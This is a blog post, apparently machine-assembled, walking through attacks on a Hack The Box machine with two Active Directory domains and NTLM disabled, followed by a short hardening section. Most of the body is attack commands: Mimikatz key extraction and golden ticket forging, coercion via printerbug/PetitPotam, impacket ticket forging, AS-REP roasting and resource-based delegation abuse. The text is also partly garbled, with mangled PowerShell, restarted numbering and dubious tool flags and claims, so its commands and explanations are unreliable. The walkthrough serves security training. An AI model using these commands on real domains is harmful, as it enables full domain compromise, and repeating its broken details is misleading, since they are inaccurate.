How I Pwned a Zero-NTLM, Dual-Domain Windows Fortress – And Why Your AD Skills Are Obsolete + Video

Listen to this Post

🐢▶️ Listen🚀

Introduction:

In modern Active Directory environments, relying on NTLM hashes or password spraying is a dead end. The latest insane-difficulty Hack The Box machine, “PingPong,” simulates a hardened Windows ecosystem with two domains, two domain controllers, zero NTLM authentication, no password hashes in transit, and a ruthless 5‑minute clock skew tolerance. One mistimed Kerberos ticket or a single misconfigured trust relationship, and the server terminates the session without warning. This article dissects the real‑world offensive techniques required to compromise such a setup, from abusing Kerberos delegation to bypassing time‑synchronization restrictions – turning a “no hash, no pass” environment into a foothold.

Learning Objectives:

• Exploit Kerberos unconstrained delegation and resource‑based constrained delegation (RBCD) across domain trusts without ever touching NTLM.
• Bypass strict clock skew tolerances using time skew manipulation and crafted ticket lifetimes.
• Enumerate Active Directory trust relationships, foreign security principals, and ACL misconfigurations using only native Windows tools and PowerShell.

You Should Know:

1. Kerberos Forging in a Zero‑NTLM, Dual‑Domain Environment

The “PingPong” machine rejects any NTLM authentication attempt – no LM, NTLMv1, or NTLMv2. All inter‑domain and client‑server authentication relies solely on Kerberos. The `5‑minute clock skew` tolerance means any ticket with a timestamp offset beyond 300 seconds is silently dropped. To succeed, you must abuse unconstrained delegation on a compromised service account, then craft inter‑realm TGTs using the `Mimikatz` Kerberos::golden technique – but with precise time offsets.

Step‑by‑step guide:

1. Enumerate delegation rights using `PowerView`:

Import-Module .\PowerView.ps1
Get-DomainUser -TrustedToAuth -Properties userprincipalname, msds-allowedtodelegateto
Get-DomainComputer -Unconstrained -Properties dnshostname

1. Compromise a server with unconstrained delegation (e.g., via a service vulnerability). Extract its machine account hash using `Mimikatz` (NTLM hash not needed – we extract Kerberos keys):

   mimikatz  privilege::debug
   mimikatz  sekurlsa::ekeys  Extract AES256 and RC4 keys
   

2. Force a domain admin to authenticate to your compromised server (e.g., via `printerbug` or PetitPotam). Capture the TGT:

   mimikatz  kerberos::list /export
   

3. Craft a golden ticket for the other domain using the extracted `krbtgt` AES256 key (must match the target domain’s clock). Adjust the `/startoffset` and `/endin` parameters to stay within the 5‑minute skew:

   mimikatz  kerberos::golden /domain:pingpong.local /sid:S-1-5-21-XXX /krbtgt:AES256_HASH /user:Administrator /target:otherdomain.local /ticket:trust_tgt.kirbi /startoffset:-2 /endin:5400 /renewmax:10080
   

   The `/startoffset:-2` (minus two minutes) compensates for plausible time drift between DCs.

4. Pass the ticket and access the second domain’s DC:

   mimikatz  kerberos::ptt trust_tgt.kirbi
   psexec \TARGET-DC.otherdomain.local -k cmd
   

Linux alternative with `impacket` and `ticketer`:

 Build inter-realm ticket
ticketer.py -domain pingpong.local -domain-sid S-1-5-21-XXX -extra-sid S-1-5-21-YYY -aesKey AES256_HASH -user Administrator -target-domain otherdomain.local -duration 5400 -start-offset -120
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass TARGET-DC.otherdomain.local

1. Bypassing the 5‑Minute Clock Skew with NTP Manipulation

When both domain controllers enforce strict time synchronization via `w32time` with no fallback to NTLM, you cannot simply modify your local clock – the Kerberos authenticator’s timestamp must match the DC’s expectation within 5 minutes. The solution lies in abusing time server misconfigurations or extracting the DC’s system time via an unauthenticated `KRB_AS_REQ` timing side‑channel.

Step‑by‑step guide:

1. Query the target DC’s current time (without authentication) using `ntpdate` or Windows w32tm:

   ntpdate -q target-dc.otherdomain.local
   

Or PowerShell:

w32tm /stripchart /computer:target-dc.otherdomain.local /dataonly /samples:5

1. If the DC uses an external NTP server, attempt to poison the NTP response via MITM (requires network positioning). Otherwise, calculate the exact offset between your attacking host and the DC.

2. When forging tickets, use the `–startoffset` parameter to align the ticket’s validity period with the DC’s clock. For example, if your host is 3 minutes and 20 seconds ahead:

   ticketer.py -startoffset -200 ...  200 seconds negative offset
   

3. For interactive logins, spawn a shell with a modified system time using `timedatectl` (Linux) or `Set-Date` (PowerShell admin) – but only if you can also synchronize after Kerberos auth. Safer: use `psexec -k` or `wmiexec -k` with the pre‑ticketed offset.

4. Persistent workaround – Create a scheduled task on the DC to temporarily widen the skew tolerance via registry (requires DA privileges):

   reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters /v MaxClockSkew /t REG_DWORD /d 600 /f
   

After exploitation, revert to `300`.

3. Enumerating Trusts and Foreign Principals Without NTLM

“PingPong” uses two domains – `PING.local` and `PONG.local` – with a bidirectional forest trust and selective authentication. No traditional SMB NULL sessions work because NTLM is disabled. You must rely on Kerberos‑only enumeration using `LDAP` over `TCP/3268` (global catalog) with a valid, unprivileged user’s Kerberos ticket.

Step‑by‑step guide:

1. Obtain an initial low‑privilege TGT (e.g., via AS‑REP roasting if any user has `DONT_REQ_PREAUTH` – rare in insane machines, but worth checking):

   impacket-GetNPUsers -dc-ip dc.ping.local ping.local/ -request -format hashcat -outputfile asreproasts.txt
   

2. Enumerate trust relationships using `PowerView` from a controlled Windows host:

   Get-DomainTrust -Domain ping.local
   Returns TrustDirection, TrustType, TargetName
   Get-DomainForeignUser -Domain ping.local  Identify users from PONG.local
   

3. Map ACLs on the trust – check which users from `PING` have `AllowedToActOnBehalfOfOtherIdentity` permissions in PONG:

   Get-DomainObjectAcl -Domain pong.local -ResolveGUIDs | Where-Object { $_.ObjectAceType -eq "AllowedToActOnBehalfOfOtherIdentity" }
   

4. Abuse resource‑based constrained delegation (RBCD) – If you can write to a machine account in PONG, set delegation to a service you control:

   Linux with rbcd.py
   rbcd.py -delegate-from 'PONG-COMP$' -delegate-to 'DC$' -dc-ip dc.pong.local -action write 'ping.local\attacker_user'
   

5. Request a service ticket for the DC’s CIFS service using S4U2self and S4U2proxy (requires a machine account in the target domain). Use impacket-getST:

   getST.py -spn cifs/dc.pong.local -impersonate Administrator -dc-ip dc.pong.local ping.local/attacker_user -aesKey AES256_KEY
   export KRB5CCNAME=Administrator.ccache
   smbclient.py -k -no-pass //dc.pong.local/c$
   

6. Mitigating the “Leave No Hash” Approach in Your Own Enterprise

For defenders, “PingPong” demonstrates that eliminating NTLM alone is insufficient. Attackers will pivot to Kerberos delegation abuse, inter‑realm trust exploitation, and timestamp manipulation. This section provides hardening commands.

Step‑by‑step guide:

1. Disable unconstrained delegation for all sensitive servers (e.g., domain controllers, file servers):

   Get-ADComputer -Filter  | Where-Object { $_.UserAccountControl -band 0x80000 } | Set-ADComputer -TrustedForDelegation $false
   

2. Enable resource‑based constrained delegation (RBCD) strictly – never allow user‑controlled writes to msDS-AllowedToActOnBehalfOfOtherIdentity:

   Audit who can modify RBCD
   dsacls "CN=DC,OU=Domain Controllers,DC=ping,DC=local" | findstr "AllowedToAct"
   

3. Harden time synchronization – force authenticated NTP with `NTPClient` and use Windows Time service with asymmetric authentication:

   w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update
   w32tm /config /requireauthentication:true /update
   

4. Detect Kerberos gold/platinum ticket forging – monitor Event ID 4769 suspicious ticket lifetimes and anomalous SIDs:

   Get-WinEvent -LogName Security | Where-Object { $<em>.Id -eq 4769 -and $</em>.Message -match "Ticket Lifetime.\b(5400|86400)\b" -and $_.Message -match "S-1-5-21-[0-9]-[0-9]-[0-9]-513" }
   

5. Apply Microsoft’s “AES only” and “disable RC4” for Kerberos encryption types. Add the target domain controllers to `Protected Users` group to prevent ticket renewal abuse.

What Undercode Say:

• Key Takeaway 1: Insane‑difficulty AD machines like “PingPong” prove that NTLM deprecation is not a silver bullet – Kerberos delegation remains the largest attack surface in modern Windows domains.
• Key Takeaway 2: Clock skew, often ignored in basic pentests, becomes a critical constraint when NTLM fallback is absent. Mastering timestamp‑aware ticket forging separates intermediate from advanced operators.
• Analysis: The pivot from unconstrained delegation to RBCD across a forest trust mirrors real‑world attacks against federated environments (e.g., Azure AD Connect, ADFS). Organisations disabling NTLM without also implementing time‑based anomaly detection or restricting delegation are still vulnerable. The 5‑minute tolerance is not a bug but a design oversight – engineers assume time sync guarantees authenticity, but a compromised local time service or an attacker with network timing control can bypass it. Expect future insane machines to introduce time‑based hashing (e.g., HMAC with timestamps) to close this loophole.

Prediction:

As NTLM fades out in favour of Kerberos and cloud‑native identity (OAuth, SAML), red teaming will shift entirely to trust delegation abuse, token theft, and time‑synchronisation attacks. Within two years, HTB and other platforms will roll out “True Zero Trust” machines that require chaining Kerberos protocol transition, S4U2self, and FAKE time-server MITM in a single attack path. Enterprises will respond by adopting time‑as‑a‑service with hardware security modules (HSMs) and mandating short‑lived (5‑minute) tickets with mandatory renewal every 2 minutes – forcing attackers to operate in near‑real‑time without any margin for error. The era of “grab hash, pass it” is finally over; the era of “manipulate time, bend trust” has just begun.

▶️ Related Video (76% Match):

https://www.youtube.com/watch?v=0hwYDYPrUXI

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Thestingr Pingpong – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky